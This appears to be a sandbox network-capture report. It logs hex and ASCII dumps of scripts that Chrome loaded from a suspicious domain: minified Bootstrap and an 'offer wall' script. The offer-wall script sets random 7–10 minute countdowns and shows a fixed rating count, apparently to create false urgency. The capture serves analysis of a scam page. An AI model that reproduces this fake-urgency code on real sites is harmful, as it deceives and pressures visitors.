                                                          2023-11-27 03:23:50 UTC721INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 34 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 30 34 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 39 30 30 34 2d 36 30 38 39 30 32 65 34 35 64 63 62 35 2d 67 7a 69 70 22 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:49 GMTContent-Type: application/javascriptTransfer-Encoding: chunkedConnection: closeLast-Modified: Wed, 25 Oct 2023 20:20:04 GMTETag: W/"9004-608902e45dcb5-gzip"Vary: Accept-EncodingCache-Contro
                                                          2023-11-27 03:23:50 UTC648INData Raw: 37 63 64 65 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 33 2e 33 2e 36 20 28 68 74 74 70 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 35 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 42 6f 6f 74 73 74 72 61 70 27 73 20 4a 61 76 61 53 63 72 69 70 74 20 72 65 71 75 69 72 65 73 20 6a 51 75 65 72 79 22 29 3b 2b 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 62 3d 61 2e 66 6e
                                                          Data Ascii: 7cde/*! * Bootstrap v3.3.6 (http://getbootstrap.com) * Copyright 2011-2015 Twitter, Inc. * Licensed under the MIT license */if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 6e 65 6e 64 22 2c 74 72 61 6e 73 69 74 69 6f 6e 3a 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 7d 3b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 62 29 69 66 28 76 6f 69 64 20 30 21 3d 3d 61 2e 73 74 79 6c 65 5b 63 5d 29 72 65 74 75 72 6e 7b 65 6e 64 3a 62 5b 63 5d 7d 3b 72 65 74 75 72 6e 21 31 7d 61 2e 66 6e 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 21 31 2c 64 3d 74 68 69 73 3b 61 28 74 68 69 73 29 2e 6f 6e 65 28 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 3d 21 30 7d 29 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 7c 7c 61 28 64 29 2e 74 72 69 67 67 65 72 28 61 2e 73 75 70 70 6f 72 74 2e 74 72 61 6e 73 69 74 69 6f 6e 2e 65
                                                          Data Ascii: nend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.e
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 61 2e 66 6e 2e 61 6c 65 72 74 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 2e 66 6e 2e 61 6c 65 72 74 3d 65 2c 74 68 69 73 7d 2c 61 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 6c 69 63 6b 2e 62 73 2e 61 6c 65 72 74 2e 64 61 74 61 2d 61 70 69 22 2c 63 2c 64 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 6f 73 65 29 7d 28 6a 51 75 65 72 79 29 2c 2b 66 75 6e 63 74 69 6f 6e 28 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 64 3d 61 28 74 68 69 73 29 2c 65 3d 64 2e 64 61 74 61 28 22 62 73 2e 62 75 74 74 6f 6e 22 29 2c 66 3d 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 62 26
                                                          Data Ascii: a.fn.alert.noConflict=function(){return a.fn.alert=e,this},a(document).on("click.bs.alert.data-api",c,d.prototype.close)}(jQuery),+function(a){"use strict";function b(b){return this.each(function(){var d=a(this),e=d.data("bs.button"),f="object"==typeof b&
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 24 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 29 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 7d 3b 76 61 72 20 64 3d 61 2e 66 6e 2e 62 75 74 74 6f 6e 3b 61 2e 66 6e 2e 62 75 74 74 6f 6e 3d 62 2c 61 2e 66 6e 2e 62 75 74 74 6f 6e 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 63 2c 61 2e 66 6e 2e 62 75 74 74 6f 6e 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 2e 66 6e 2e 62 75 74 74 6f 6e 3d 64 2c 74 68 69 73 7d 2c 61 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 6c 69 63 6b 2e 62 73 2e 62 75 74 74 6f 6e 2e 64 61 74 61 2d 61 70 69 22 2c 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 5e 3d 22 62 75 74 74 6f 6e 22 5d 27 2c 66 75
                                                          Data Ascii: $element.hasClass("active")),this.$element.toggleClass("active")};var d=a.fn.button;a.fn.button=b,a.fn.button.Constructor=c,a.fn.button.noConflict=function(){return a.fn.button=d,this},a(document).on("click.bs.button.data-api",'[data-toggle^="button"]',fu
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 6f 75 73 65 6c 65 61 76 65 2e 62 73 2e 63 61 72 6f 75 73 65 6c 22 2c 61 2e 70 72 6f 78 79 28 74 68 69 73 2e 63 79 63 6c 65 2c 74 68 69 73 29 29 7d 3b 63 2e 56 45 52 53 49 4f 4e 3d 22 33 2e 33 2e 36 22 2c 63 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 44 55 52 41 54 49 4f 4e 3d 36 30 30 2c 63 2e 44 45 46 41 55 4c 54 53 3d 7b 69 6e 74 65 72 76 61 6c 3a 35 65 33 2c 70 61 75 73 65 3a 22 68 6f 76 65 72 22 2c 77 72 61 70 3a 21 30 2c 6b 65 79 62 6f 61 72 64 3a 21 30 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 64 6f 77 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 2f 69 6e 70 75 74 7c 74 65 78 74 61 72 65 61 2f 69 2e 74 65 73 74 28 61 2e 74 61 72 67 65 74 2e 74 61 67 4e 61 6d 65 29 29 7b 73 77 69 74 63 68 28 61 2e 77 68 69 63 68 29 7b 63 61 73 65 20 33 37
                                                          Data Ascii: ouseleave.bs.carousel",a.proxy(this.cycle,this))};c.VERSION="3.3.6",c.TRANSITION_DURATION=600,c.DEFAULTS={interval:5e3,pause:"hover",wrap:!0,keyboard:!0},c.prototype.keydown=function(a){if(!/input|textarea/i.test(a.target.tagName)){switch(a.which){case 37
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 69 6f 6e 2e 65 6e 64 29 2c 74 68 69 73 2e 63 79 63 6c 65 28 21 30 29 29 2c 74 68 69 73 2e 69 6e 74 65 72 76 61 6c 3d 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 69 6e 74 65 72 76 61 6c 29 2c 74 68 69 73 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 6e 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 6c 69 64 69 6e 67 3f 76 6f 69 64 20 30 3a 74 68 69 73 2e 73 6c 69 64 65 28 22 6e 65 78 74 22 29 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 70 72 65 76 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 6c 69 64 69 6e 67 3f 76 6f 69 64 20 30 3a 74 68 69 73 2e 73 6c 69 64 65 28 22 70 72 65 76 22 29 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 64 65 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 64 29
                                                          Data Ascii: ion.end),this.cycle(!0)),this.interval=clearInterval(this.interval),this},c.prototype.next=function(){return this.sliding?void 0:this.slide("next")},c.prototype.prev=function(){return this.sliding?void 0:this.slide("prev")},c.prototype.slide=function(b,d)
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 2e 66 6e 2e 63 61 72 6f 75 73 65 6c 3d 64 2c 74 68 69 73 7d 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 76 61 72 20 64 2c 65 3d 61 28 74 68 69 73 29 2c 66 3d 61 28 65 2e 61 74 74 72 28 22 64 61 74 61 2d 74 61 72 67 65 74 22 29 7c 7c 28 64 3d 65 2e 61 74 74 72 28 22 68 72 65 66 22 29 29 26 26 64 2e 72 65 70 6c 61 63 65 28 2f 2e 2a 28 3f 3d 23 5b 5e 5c 73 5d 2b 24 29 2f 2c 22 22 29 29 3b 69 66 28 66 2e 68 61 73 43 6c 61 73 73 28 22 63 61 72 6f 75 73 65 6c 22 29 29 7b 76 61 72 20 67 3d 61 2e 65 78 74 65 6e 64 28 7b 7d 2c 66 2e 64 61 74 61 28 29 2c 65 2e 64 61 74 61 28 29 29 2c 68 3d 65 2e 61 74 74 72 28 22 64 61 74 61 2d 73 6c 69 64 65 2d 74 6f 22 29 3b 68 26 26 28 67 2e 69 6e 74 65 72 76 61
                                                          Data Ascii: unction(){return a.fn.carousel=d,this};var e=function(c){var d,e=a(this),f=a(e.attr("data-target")||(d=e.attr("href"))&&d.replace(/.*(?=#[^\s]+$)/,""));if(f.hasClass("carousel")){var g=a.extend({},f.data(),e.data()),h=e.attr("data-slide-to");h&&(g.interva
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 67 6c 65 3a 21 30 7d 2c 64 2e 70 72 6f 74 6f 74 79 70 65 2e 64 69 6d 65 6e 73 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 22 77 69 64 74 68 22 29 3b 72 65 74 75 72 6e 20 61 3f 22 77 69 64 74 68 22 3a 22 68 65 69 67 68 74 22 7d 2c 64 2e 70 72 6f 74 6f 74 79 70 65 2e 73 68 6f 77 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 74 68 69 73 2e 74 72 61 6e 73 69 74 69 6f 6e 69 6e 67 26 26 21 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 68 61 73 43 6c 61 73 73 28 22 69 6e 22 29 29 7b 76 61 72 20 62 2c 65 3d 74 68 69 73 2e 24 70 61 72 65 6e 74 26 26 74 68 69 73 2e 24 70 61 72 65 6e 74 2e 63 68 69 6c 64 72 65 6e 28 22 2e 70 61 6e 65 6c 22 29 2e 63 68 69 6c 64 72 65 6e 28 22 2e 69
                                                          Data Ascii: gle:!0},d.prototype.dimension=function(){var a=this.$element.hasClass("width");return a?"width":"height"},d.prototype.show=function(){if(!this.transitioning&&!this.$element.hasClass("in")){var b,e=this.$parent&&this.$parent.children(".panel").children(".i
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 61 2d 65 78 70 61 6e 64 65 64 22 2c 21 31 29 2c 74 68 69 73 2e 24 74 72 69 67 67 65 72 2e 61 64 64 43 6c 61 73 73 28 22 63 6f 6c 6c 61 70 73 65 64 22 29 2e 61 74 74 72 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 2c 21 31 29 2c 74 68 69 73 2e 74 72 61 6e 73 69 74 69 6f 6e 69 6e 67 3d 31 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 74 72 61 6e 73 69 74 69 6f 6e 69 6e 67 3d 30 2c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 63 6f 6c 6c 61 70 73 69 6e 67 22 29 2e 61 64 64 43 6c 61 73 73 28 22 63 6f 6c 6c 61 70 73 65 22 29 2e 74 72 69 67 67 65 72 28 22 68 69 64 64 65 6e 2e 62 73 2e 63 6f 6c 6c 61 70 73 65 22 29 7d 3b 72 65 74 75 72 6e 20 61 2e 73 75 70 70 6f 72 74 2e 74 72 61 6e 73 69 74 69 6f 6e
                                                          Data Ascii: a-expanded",!1),this.$trigger.addClass("collapsed").attr("aria-expanded",!1),this.transitioning=1;var e=function(){this.transitioning=0,this.$element.removeClass("collapsing").addClass("collapse").trigger("hidden.bs.collapse")};return a.support.transition


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.549730104.21.1.74434324C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2023-11-27 03:23:49 UTC3697OUTGET /assets/js/scripts-w14-t-f-qc-v2-fst-ri.js?v=5.40&cc=us HTTP/1.1
                                                          Host: sofa.thriveuniversehq.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://sofa.thriveuniversehq.com/yufapeso/yeje/sudulexu/rocalibu/zo/index.php?rpclk=kKkPwoNj0jiBH%2BtNEHYbBY%2FIgU%2By%2FtRXgUDJ6ipR1fPGjOtoXyRNxYs8BX6VqvAzrIg9pOgXjUJk8x9%2Bt0A%2FGkUc3Y7FK%2BzxfU1xLbwpncoX4QEEPNKeHkoGpdSmC06X9AutB9fPmCeVJ%2FxioY%2B%2FaeZQLzpDexEKo7QNhK7lxFPmr7FNiImBJD%2BJ2TMLxY4mFiI%2Bs5HSc9AOjOxP9ePSApGIjg%2BFTuEpEnzH518l7%2B3UDXULelrXOAU4rDQEw584WrOwmLgU2rjoJYiUlX%2BkHN%2F1GZWv41fRi1o1RsuaIaDjwP9G3MLnWd7gxCOXxl1sBLS0Bt4TO5kdsRhqvKx0i7gPAUjAv%2BTHkSjTU5VMWXVQ1D7yfytWJ4vjqJji8KMY2vA95PmeKRQXTh98zt7reu664F5tHC6PLSjWUDx3ZxYdbSIgzfV%2Bb4NsoUOa8jVNsAGB8aUlK6S6c3zMtcnn2ICXU9bfEJZ6tRhn8x1CWxZGPoJ9tLW4nlV%2FlLQE6SUfhJ%2BNyZsyz7QUeiM0H%2FdtsgmKv1yGuy21EHtCosnB2kogSUmv25twMntyWBvar88LMX4gLGk70C7r9t3P1ioZymlLRnJ5anyPEYWz8js7ycr85z33XojsZWd%2B%2BAfRhVqH5rnddMwEYCT5tJgJ5NB1Az5a8lalTFRTf8S4L%2FMz7zcjXdUSmDBdsD%2BooBKzE4IxaI1gbY1xSU4HE4TjmOfAYZY7pL7YWA%2BRc12UYf7bGSWzU4SL%2FQhqt67Nqq3Hayy0GT52%2BzTY5%2F2oyMKj8fNprIM534olb1cfC%2FAwRZsTZPQ4eecEohQ5MKWqcRI0BkbKwd5SARhv02qBuNjr8AYN85TnOAmLnEHrwhSd7NfCYvmuxPrAq05UVb8seW8Oa68a%2FzPHG%2FWUzTG8%2Fmfj33Y1%2B4hfQrD5Nr8OleZ91PDVowsbYdNHMY5tGoEF2eudTKC1%2F65WFV3LfJ0Kb9BVcc11O31D8gyZEHQ6hue8U9Cmyv1CdLKlsSghFjKHm50aFhzXUgQ%2F6YSAzHWjh26AF%2BXTT0rJmOaFWiT3xVclBE%2Fuvlfe0QPfPBtA11C40ZUlm5nKUxDcE7PQ5aFOS1xVGWH8zM6YBBTd7SNwenOIQLnqxQFCP0H3R%2FZgnFaWf0SPUZErjTWb5g3XynnxOB%2FRusUsa%2BEWmvhP0vmi4Gu8DiGeKFmwSCee%2FK2wuEDCqcC9kXt7%2BUo37er98qknkmXf2Aw%2F9b2ELDbk%2FKlLveMRGzaQFTqgsEh2aOuQofHQ6JwcU4qxiLKi0qxRPrI4eNsGrueSWdV3WoJ9rHOGT9pjcJcpbHAjfJbuJiaioukFhwqvt%2BmyotjQbYwFoFeAgB1w16swQ4mXrfagLznHUqwqagO48bOMdY3z%2BOz8dx3uBSoK7hMrXYbEC8DPQQlstcRNwIjNOLWda3X1ZlAH75iWbLzSwMQ9Pou%2FhzP5RLoQ8QQZrbLzf0Sg%2BI71Ob8RAOw3BWGWT%2B3LOIkw1DLHz%2Bq4Ol0iJRXqa4FBsmcdWveJuXikkGyeIZdH4Bv7aaZlhOI6DTqRDqU09rIYEpCzcgrCRkHR6vNmzYpRpNicqLOufOVYYu%2BBXseIpLUscXyqrsiVWTC4RaEof2TO4kosApJSR7xKckzb60M2TMc6Psp1GsWCBV60DYJFQKvPTUrb1Vf4kS1hstbNh6jzp33VDYn3KcOqdymTI3J9IJFhrVbmJ9xi5fL3ncEdY%2FBYD9ipL7wCn55xLGz3Rj1KghNnomC7M9hL03uOI4x2KD65die6YhLObI0E5ghleOyUa%2F8INk79PLNmOnB6vNc1trpjke6LhqAKl4fmlc6ZmO7%2FzI%2BX5FPhl0AADGAMPgb%2FY16AyC%2F9NHA0JUDiPD4Z8%2FRNJtY0Ce63XUnP8I9X2LayEOYmwqnN4jv%2FUJXaZ6e1f6gQxN5g%2BpQuvI8b%2FL%2FWCEfGqAt%2F6tAt5BP5gyZV7711TmuiPwisKuECDfivpsqVaxiJf4%2BXKaPur0lYZKxTgdLB2GkOeipHEYW%2BSyOjumq3RA79oMBQMegub9dOHI7Gfs6HtAbvOCB2E%2BjWf79rsdIkB0A9H%2BooeH7Kx70fmLfCnEdb8LYQbCudeMEFv12sID8fAaJx%2BCklhQJ2cY0l8U12GNMbxWof0YcR%2FuDKWvABD2i23EqytBIbUQfMb8HZUFmf%2BKFQA7%2BKwtjPDdDDMp1Xqq7wHwvHUQwERxtJ1pHDvfKkplLh3qPLbYibh1I%2BeVFRj0L%2BF1XKjiCVnYgJIYzO%2FBrGvBMok5jZ4ZRYhuxYJIiSHX8qOwos3%2BG2fpybd2ETADj1EQ7givHibP6egOW4kixEoJgS3QcchSqIvmeWBo4mGddqdQIPd%2BHZxs89TLhGHWWlMcIM4V%2B3SgEHXt6mFfj7aMXfgPyduvwx5iY1X%2FZKXvM9XBhWIKAd29vYYl3CSuSFO0wtW2B3KYpqmTw%2Bf72G6VQ1bnEY1d4wW%2FdX6YjKkNUpI%2Bm626sfqxB0ItTmyLHZ3BfzGHJQdffMJNduLQBBEmBrF49UI8tnZuMJHSn5lUjl1eEW%2BtW%2BnE6ClP%2FqqPW7cM91X4iwPR53JhAUbZASI5CIRgMv5po5bREQSNUJsPahC%2BXxBw%3D%3D%3A%3Ab76a4ddd668b8221d0b29b84fe1b8e47&p=OU88ie4lk0tb%2BbQ%2Ba8dRzdVt0WbPpQ%3D%3D%3A%3A4c8b9eba2c435fd063cb913ee9e2c7e9&oho=svylst.com&ptf=848bd2316dc3abc1c9b4aad2b173f936
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=t5c6gd280daerfkplaihlm7jo6; cid=102aa64292fcfaffbb357ae599eda0
                                                          2023-11-27 03:23:50 UTC717INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 4d 6f 6e 2c 20 32 37 20 4e 6f 76 20 32 30 32 33 20 30 33 3a 32 33 3a 34 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 57 65 64 2c 20 32 35 20 4f 63 74 20 32 30 32 33 20 32 30 3a 32 30 3a 30 34 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 33 37 36 33 2d 36 30 38 39 30 32 65 34 34 66 32 35 35 2d 67 7a 69 70 22 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f
                                                          Data Ascii: HTTP/1.1 200 OKDate: Mon, 27 Nov 2023 03:23:49 GMTContent-Type: application/javascriptTransfer-Encoding: chunkedConnection: closeLast-Modified: Wed, 25 Oct 2023 20:20:04 GMTETag: W/"3763-608902e44f255-gzip"Vary: Accept-EncodingCache-Contro
                                                          2023-11-27 03:23:50 UTC652INData Raw: 33 37 36 33 0d 0a 76 61 72 20 78 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 0d 0a 76 61 72 20 78 31 20 3d 20 78 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 66 69 6e 64 47 65 74 50 61 72 61 6d 65 74 65 72 28 70 61 72 61 6d 65 74 65 72 4e 61 6d 65 29 20 7b 0d 0a 20 20 20 20 76 61 72 20 72 65 73 75 6c 74 20 3d 20 6e 75 6c 6c 2c 0d 0a 20 20 20 20 20 20 20 20 74 6d 70 20 3d 20 5b 5d 3b 0d 0a 20 20 20 20 76 61 72 20 69 74 65 6d 73 20 3d 20 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 2e 73 75 62 73 74 72 28 31 29 2e 73 70 6c 69 74 28 22 26 22 29 3b 0d 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 69 6e 64 65 78 20 3d 20 30 3b 20 69 6e 64 65 78 20 3c 20 69 74 65 6d 73 2e 6c 65 6e 67 74 68 3b 20 69 6e 64 65 78 2b 2b 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 74 6d 70 20 3d 20 69
                                                          Data Ascii: 3763var x = new Date();var x1 = x;function findGetParameter(parameterName) { var result = null, tmp = []; var items = location.search.substr(1).split("&"); for (var index = 0; index < items.length; index++) { tmp = i
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 0a 7d 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 57 61 6c 6c 20 28 29 20 7b 0d 0a 09 76 61 72 20 63 6f 75 6e 74 44 6f 77 6e 44 61 74 65 41 6a 61 78 3b 0d 0a 09 76 61 72 20 65 6e 64 44 61 74 65 41 6a 61 78 20 3d 20 41 72 72 61 79 28 29 3b 20 0d 0a 09 76 61 72 20 63 75 72 72 65 6e 74 54 69 6d 65 41 6a 61 78 3b 0d 0a 09 0d 0a 09 74 72 6b 63 6c 6b 28 29 3b 0d 0a 09 0d 0a 09 69 66 20 28 74 79 70 65 6f 66 20 67 74 61 67 20 21 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 29 20 7b 0d 0a 09 09 76 61 72 20 73 63 72 69 70 74 5f 74 61 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 09 09 73 63 72 69 70 74 5f 74 61 67 2e 74 79 70 65 20 3d 20 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3b 0d
                                                          Data Ascii: }function loadWall () {var countDownDateAjax;var endDateAjax = Array(); var currentTimeAjax;trkclk();if (typeof gtag != 'undefined') {var script_tag = document.createElement('script');script_tag.type = 'text/javascript';
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 70 78 20 31 36 70 78 20 39 70 78 20 31 36 70 78 3b 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 20 77 69 64 74 68 3a 20 39 30 25 3b 22 3e 3c 64 69 76 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 35 70 78 3b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 69 6d 61 67 65 73 2f 34 2d 35 2e 70 6e 67 22 20 73 74 79 6c 65 3d 22 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 20 68 65 69 67 68 74 3a 20 32 30 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 34 70 78 3b 22 3e 20 28 35 33 36 29 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d
                                                          Data Ascii: px 16px 9px 16px; border: none; margin-left: auto; margin-right: auto; width: 90%;"><div align="center" style="margin-bottom: 5px;"><img src="/assets/images/4-5.png" style="border: none; height: 20px; margin-top: -4px;"> (536)</div></div><div class="col-m
                                                          2023-11-27 03:23:50 UTC1369INData Raw: 69 6d 65 41 6a 61 78 20 3d 20 44 61 74 65 2e 70 61 72 73 65 28 6e 65 77 20 44 61 74 65 28 29 29 3b 0d 0a 09 2f 2f 6e 6f 77 20 73 65 74 20 72 61 6e 64 6f 6d 20 65 6e 64 20 74 69 6d 65 73 20 61 6e 64 20 69 6e 69 74 20 74 68 65 20 63 6f 75 6e 74 65 72 73 0d 0a 09 66 6f 72 20 28 76 61 72 20 6a 20 3d 20 30 3b 20 6a 20 3c 3d 20 6f 66 66 65 72 5f 74 69 63 6b 3b 20 6a 2b 2b 29 20 7b 0d 0a 09 09 76 61 72 20 74 69 6d 65 49 6e 4d 69 6e 75 74 65 73 41 6a 61 78 20 3d 20 67 65 74 52 61 6e 64 6f 6d 49 6e 74 28 37 2c 20 31 30 29 3b 0d 0a 09 09 76 61 72 20 74 69 6d 65 49 6e 53 65 63 6f 6e 64 73 41 6a 61 78 20 3d 20 67 65 74 52 61 6e 64 6f 6d 49 6e 74 28 30 2c 20 35 39 29 3b 0d 0a 09 09 65 6e 64 44 61 74 65 41 6a 61 78 5b 6a 5d 20 3d 20 6e 65 77 20 44 61 74 65 28 63 75 72
                                                          Data Ascii: imeAjax = Date.parse(new Date());//now set random end times and init the countersfor (var j = 0; j <= offer_tick; j++) {var timeInMinutesAjax = getRandomInt(7, 10);var timeInSecondsAjax = getRandomInt(0, 59);endDateAjax[j] = new Date(cur
